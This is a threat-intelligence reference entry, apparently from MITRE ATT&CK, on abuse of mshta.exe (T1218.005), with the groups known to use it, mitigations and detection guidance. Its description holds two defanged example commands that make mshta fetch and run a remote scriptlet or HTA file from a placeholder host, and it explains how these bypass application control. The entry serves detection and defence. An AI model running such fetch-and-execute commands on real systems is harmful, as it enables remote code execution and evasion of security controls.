# Mshta (T1218.005)

## Description
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code      

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files.  HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. 

Files may be executed by mshta.exe through an inline script: ```mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))```

They may also be executed directly from URLs: ```mshta http[:]//webserver/payload[.]hta```

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. 

## Parent Technique
- System Binary Proxy Execution (T1218)

## Tactics
- Defense Evasion (TA0005)

## Related Groups
- Sidewinder (G0121)
- Lazarus Group (G0032)
- MuddyWater (G0069)
- Mustang Panda (G0129)
- LazyScripter (G0140)
- TA2541 (G1018)
- APT38 (G0082)
- Inception (G0100)
- Kimsuky (G0094)
- FIN7 (G0046)
- Earth Lusca (G1006)
- APT32 (G0050)
- APT29 (G0016)
- Confucius (G0142)
- TA551 (G0127)
- SideCopy (G1008)
- Gamaredon Group (G0047)

## Mitigations
- Execution Prevention (M1038)
- Disable or Remove Feature or Program (M1042)

## Detection
Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.

Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious

### Detailed Detection by Data Source/Component
#### Process: Process Creation (DS0009): 
Use process monitoring to monitor the execution and arguments of mshta.exe.

#### File: File Creation (DS0022): 
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious

#### Command: Command Execution (DS0017): 
Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.

#### Network Traffic: Network Connection Creation (DS0029): 
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 

